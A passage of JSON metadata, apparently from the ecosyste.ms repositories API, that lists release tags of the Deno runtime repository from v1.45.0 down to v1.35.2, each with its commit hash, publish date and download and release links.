osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re